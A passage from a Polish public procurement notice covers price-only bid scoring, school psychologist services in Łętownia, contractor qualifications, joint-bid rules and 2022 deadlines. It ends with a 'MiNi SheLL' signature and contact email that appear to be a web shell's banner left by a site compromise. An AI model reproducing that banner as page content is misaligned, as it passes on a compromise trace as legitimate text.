bad) × 100 pkt<br/><br/>gdzie:<br/>C – ilość punktów, jakie otrzyma badana oferta za kryterium „Cena”,<br/>C(of. min) – najniższa cena spośród ofert nie podlegających odrzuceniu,<br/>C(of. bad) – cena oferty badanej.<br/><br/>2) Zamawiający do oceny kryterium „Cena – (C)” pobierze dane z oferty Wykonawcy.<br/>3) W kryterium „Cena” oferta z najniższą ceną otrzyma 100 pkt. natomiast pozostałe oferty po<br/>przeliczeniu zgodnie z powyższym wzorem odpowiednio mniej.<br/><br/>3. Za najkorzystniejszą ofertę zostanie uznana oferta, która otrzyma największą ilość punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> „Świadczenie usług w zakresie wsparcia psychologicznego w Szkole Podstawowej im. św. Jana Pawła II w Łętowni”<br/><br/>1. Przedmiotem zamówienia jest świadczenie usług w zakresie wsparcia psychologicznego, polegające na wykonywaniu zadań wynikających z Rozporządzenia Ministra Edukacji Narodowej z 9 sierpnia 2017 r. w sprawie zasad organizacji i udzielania pomocy psychologiczno-pedagogicznej w publicznych przedszkolach, szkołach i placówkach (Dz. U. z 2020 r. poz. 1280) w Szkole Podstawowej im. św. Jana Pawła II w Łętowni w wymiarze 5h tygodniowo przez ok. 40 tygodni w okresie realizacji projektu.<br/><br/>2. Świadczenie usług odbywać się będzie od poniedziałku do piątku, według planu ustalonego przez dyrektora szkoły z wyłączeniem ferii, wakacji, dni opiekuńczych i innych wolnych od zajęć dydaktycznych. <br/><br/>3. W przypadku niemożliwości zrealizowania przez Wykonawcę umowy zgodnie z ustalonym planem, spowodowanej usprawiedliwioną nieobecnością udokumentowaną zwolnieniem lekarskim lub innym dokumentem urzędowym Wykonawca jest zobowiązany do odpracowania ilości godzin równej nieodbytym zajęciom, w terminie uzgodnionym z dyrektorem szkoły. Dopuszcza się odpracowanie przez Wykonawcę niezrealizowanych godzin w innych przypadkach w terminach ustalonych z dyrektorem szkoły. <br/><br/>4. Wykonawca zobowiązany będzie zapewnić porządek podczas realizacji umowy, bezpieczeństwo uczniów korzystających ze świadczonych przez Wykonawcę usług oraz zgodne z przeznaczeniem użytkowanie sprzętu, materiałów i pomocy dydaktycznych.<br/><br/>5.	Zamawiający, dyrektor szkoły oraz inne upoważnione instytucje mają prawo do dokonania kontroli przebiegu i sposobu prowadzenia zajęć. <br/><br/>6.	Zadania psychologa szkolnego: <br/>1)	prowadzenie badań i działań diagnostycznych uczniów, w tym diagnozowanie indywidualnych potrzeb rozwojowych i edukacyjnych oraz możliwości psychofizycznych uczniów w celu określenia przyczyn niepowodzeń edukacyjnych oraz wspieranie mocnych stron uczniów; <br/>2)	diagnozowanie sytuacji wychowawczych w szkole w celu rozwiązywania problemów wychowawczych oraz wspierania rozwoju uczniów; <br/>3)	udzielanie pomocy psychologiczno-pedagogicznej w formach odpowiednich do rozpoznanych potrzeb; <br/>4)	podejmowanie działań z zakresu profilaktyki uzależnień i innych problemów dzieci i młodzieży; <br/>5)	minimalizowanie skutków zaburzeń rozwojowych, zapobieganie zaburzeniom zachowania oraz inicjowanie różnych form pomocy w środowisku szkolnym i pozaszkolnym uczniów; <br/>6)	inicjowanie i prowadzenie działań mediacyjnych i interwencyjnych w sytuacjach kryzysowych; <br/>7)	pomoc rodzicom i nauczycielom w rozpoznawaniu i rozwijaniu indywidualnych możliwości, predyspozycji i uzdolnień uczniów; <br/>8)	wspieranie nauczycieli, wychowawców grup wychowawczych i innych specjalistów w udzielaniu pomocy psychologiczno-pedagogicznej; <br/>9)	psycholog będzie odpowiadał za przygotowanie, realizację i dokumentację spotkań z uczniami; <br/>10)	prowadzenie dokumentacji obowiązującej w szkole – dziennik pracy psychologa szkolnego, plan pracy psychologa szkolnego, teczki uczniów, karty diagnoz; <br/>11)	sporządzanie sprawozdań z pracy – za I i II okres roku szkolnego i na zakończenie pracy w placówce; <br/>12)	realizacja zadań opiekuńczych; <br/>13)	inne zadania zlecone przez dyrektora szkoły; <br/>14)	udział w pracach zespołów nauczycieli i specjalistów pracujących z uczniami; <br/>15)	dokonywanie wielospecjalistycznej oceny poziomu funkcjonowania uczniów; <br/>16)	współpraca z nauczycielami, wychowawcami i specjalistami w zakresie przygotowania się do zajęć, przygotowywanie materiałów i pomocy do zajęć; <br/>17)	sporządzanie sprawozdań z realizacji zadań; <br/>18)	przestrzeganie przepisów prawa oświatowego i regulaminów obowiązujących w szkole oraz przepisów bhp; <br/>19)	przestrzeganie przepisów o ochronie danych osobowych;<br/>20)	szczegółowy zakres obowiązków ujęty został w projekcie umowy, stanowiącym załącznik do SWZ; <br/>21)	psycholog zobowiązany będzie posiadać wszelkie niezbędne materiały dydaktyczne; <br/>22)	w przypadku wprowadzenia w szkole nauczania zdalnego lub hybrydowego zatrudnionego obowiązuje realizacja wszystkich zadań w trybie zdalnym. <br/><br/>7.	Rozliczenie godzin pracy psychologa następować będzie w cyklu miesięcznym na podstawie dziennika zajęć.<br/><br/>8.	Sposób realizacji umowy (zdalnie/stacjonarnie) w okresie pandemii może ulec zmianie, ostateczna decyzja należeć będzie do dyrektora danej szkoły. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85121270-6 - Usługi psychiatryczne lub psychologiczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-02-28</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający dokona oceny ofert przyznając punkty w oparciu o<br/>następujące kryteria oceny ofert:<br/>1) Cena – (C) – waga 100%.<br/><br/>2. Zasady oceny za kryterium „Cena”:<br/>1) Punkty za kryterium „Cena” (C) zostaną obliczone w następujący sposób:C = <br/><br/>C(of. min) / C(of. bad) × 100 pkt<br/><br/>gdzie:<br/>C – ilość punktów, jakie otrzyma badana oferta za kryterium „Cena”,<br/>C(of. min) – najniższa cena spośród ofert nie podlegających odrzuceniu,<br/>C(of. bad) – cena oferty badanej.<br/><br/>2) Zamawiający do oceny kryterium „Cena – (C)” pobierze dane z oferty Wykonawcy.<br/>3) W kryterium „Cena” oferta z najniższą ceną otrzyma 100 pkt. natomiast pozostałe oferty po<br/>przeliczeniu zgodnie z powyższym wzorem odpowiednio mniej.<br/><br/>3. Za najkorzystniejszą ofertę zostanie uznana oferta, która otrzyma największą ilość punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy spełniają warunki, dotyczące:<br/><br/>1.	Zdolności do występowania w obrocie gospodarczym.<br/>Zamawiający nie określa wymagań w zakresie spełniania tego warunku.<br/><br/>2.	Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów.<br/>Zamawiający nie określa wymagań w zakresie spełniania tego warunku.<br/><br/>3.	Sytuacji ekonomicznej lub finansowej.<br/>Zamawiający nie określa wymagań w zakresie spełniania tego warunku. <br/><br/>4.	Zdolności technicznej lub zawodowej.<br/>W celu potwierdzenia spełnienia tego warunku Wykonawca wykaże, że dysponuje lub będzie dysponował co najmniej 1 osobą, która posiada wykształcenie wyższe magisterskie z zakresu psychologii oraz kwalifikacje pedagogiczne. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Wykonawcy wraz z ofertą składają aktualne na dzień składania ofert<br/>oświadczenie o niepodleganiu wykluczeniu z postępowania, wg załącznika nr 2 do SWZ.<br/>2. Po dokonaniu wstępnej oceny ofert Zamawiający nie będzie wymagał od Wykonawcy, którego oferta została najwyżej oceniona, złożenia podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Wykonawcy wraz z ofertą składają aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu, wg załącznika nr 2 do SWZ.<br/>2. Po dokonaniu wstępnej oceny ofert Zamawiający będzie żądał od Wykonawcy, którego oferta została najwyżej oceniona złożenia następujących podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu:<br/>1) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (wg załącznika nr 5 do SWZ).</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/><br/>2.	Przepisy dotyczące wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/><br/>3.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać wykluczeniu z powodu niespełniania warunków, o których mowa w rozdziale 7 SWZ, natomiast spełnianie warunków udziału w postępowaniu, o których mowa w rozdziale 8 SWZ muszą zostać spełnione przez Wykonawców łącznie.<br/><br/>4.	W przypadku, o którym mowa w pkt. 1, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo lub inny dokument ustanawiający pełnomocnika winno być załączone do oferty. <br/>Pełnomocnictwo winno:<br/>a)	określać do jakiego postępowania ma zastosowanie,<br/>b)	wskazywać pełnomocnika oraz zakres jego umocowania,<br/>c)	zawierać nazwę z określeniem adresu i siedziby wszystkich Wykonawców ubiegających się wspólnie o udzielenie niniejszego zamówienia.<br/><br/>5.	Zaleca się, aby Pełnomocnikiem był jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/><br/>6.	Dokument pełnomocnictwa musi być podpisany przez wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia. Podpisy muszą być złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze.<br/><br/>7.	Pełnomocnictwo lub inny dokument ustanawiający pełnomocnika przekazuje się w postaci elektronicznej i opatruje się kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym. W przypadku gdy pełnomocnictwo zostało sporządzone jako dokument w postaci papierowej i opatrzone własnoręcznym podpisem, przekazuje się cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym, poświadczające zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej. Przez cyfrowe odwzorowanie należy rozumieć dokument elektroniczny będący kopią elektroniczną treści zapisanej w postaci papierowej, umożliwiający zapoznanie się z tą treścią i jej zrozumienie, bez konieczności bezpośredniego dostęp u do oryginału.<br/><br/>8.	Pełnomocnik pozostaje w kontakcie z Zamawiającym, w toku postępowania zwraca się do Zamawiającego z wszelkimi sprawami i do niego Zamawiający kieruje informacje, korespondencję itp.<br/><br/>9.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a)	oświadczenie, o którym mowa w pkt. 9.1 ppkt. 2 SWZ składa z ofertą każdy z Wykonawców wspólnie ubiegających się o zamówienie,<br/>b)	do oferty dołączają oświadczenie, o którym mowa w pkt. 9.1 ppkt. 3) SWZ (w przypadku, o którym mowa w pkt. 8.7 SWZ). Oświadczenie to jest podmiotowym środkiem dowodowym,<br/>c)	na wezwanie Zamawiającego zobowiązani są do złożenia podmiotowych środków dowodowych, o których mowa w pkt. 9.2 SWZ, przy czym podmiotowe środki dowodowe, o których mowa:<br/>-	w pkt. 9.2.1 SWZ składa odpowiednio Wykonawca, który wykazuje spełnianie warunku, w zakresie i na zasadach opisanych w pkt. 8.2 SWZ.<br/><br/>10.	Wspólnicy spółki cywilnej/uczestnicy konsorcjum są traktowani jak Wykonawcy składający ofertę wspólną.<br/><br/>11.	Przed podpisaniem umowy (w przypadku wyboru oferty wspólnej jako najkorzystniejszej) Wykonawcy składający ofertę wspólną mają obowiązek przedstawić Zamawiającemu umowę konsorcjum/umowę spółki cywilnej. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający dopuszcza możliwość wprowadzenia zmian do zawartej umowy na podstawie art. 454 455 ustawy Pzp oraz postanowień § 15 projektu umowy.<br/><br/>2. Nie stanowi zmiany umowy w rozumieniu art. 454 ustawy Prawo zamówień publicznych:<br/>1) zmiany danych teleadresowych,<br/>2) zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiana nr rachunku bankowego).<br/><br/>3. Zmiany do umowy może inicjować zarówno Zamawiający jak i Wykonawca, składając pisemny wniosek do drugiej strony, zawierający w szczególności opis zmiany i jej uzasadnienie. Wszelkie zmiany treści umowy wymagają zgody obydwu stron i formy pisemnej pod rygorem nieważności.<br/><br/>4. Wykonawca zobowiązany jest wykazać zaistnienie okoliczności wskazanych w ust. 2 poprzez przedłożenie stosownych ekspertyz, opinii, dokumentów, itp.<br/><br/>5. Podpisanie aneksu do umowy powinno być poprzedzone, pod rygorem nieważności, sporządzeniem protokołu konieczności zawierającego istotne okoliczności wprowadzenia zmian.<br/><br/>6. Konsekwencją zmiany umowy (aneksowania) może być w szczególności zmiana terminu zakończenia realizacji zadania, wydłużenie terminów obowiązywania zabezpieczenia należytego wykonania umowy.<br/><br/>7. Zmiana wysokości wynagrodzenia wymaga zmiany umowy w drodze aneksu.<br/><br/>8. Zamawiający jest uprawniony do żądania zmiany sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy w związku ze zmianami zawartej przez Zamawiającego umowy o dofinansowanie projektu lub zmianami wytycznych dotyczących realizacji projektu.<br/><br/>9. Ze względu na ograniczoną liczbę znaków, które można wprowadzić do treści ogłoszenia, pozostałe informacje zawarto w projekcie umowy, stanowiącym załącznik nr 4 do SWZ, dostępnym na stronie prowadzonego postępowania. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-02-17 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z załącznikami należy złożyć za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na ePUAP i udostępnionego również na miniPortalu.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-02-17 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-03-18</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com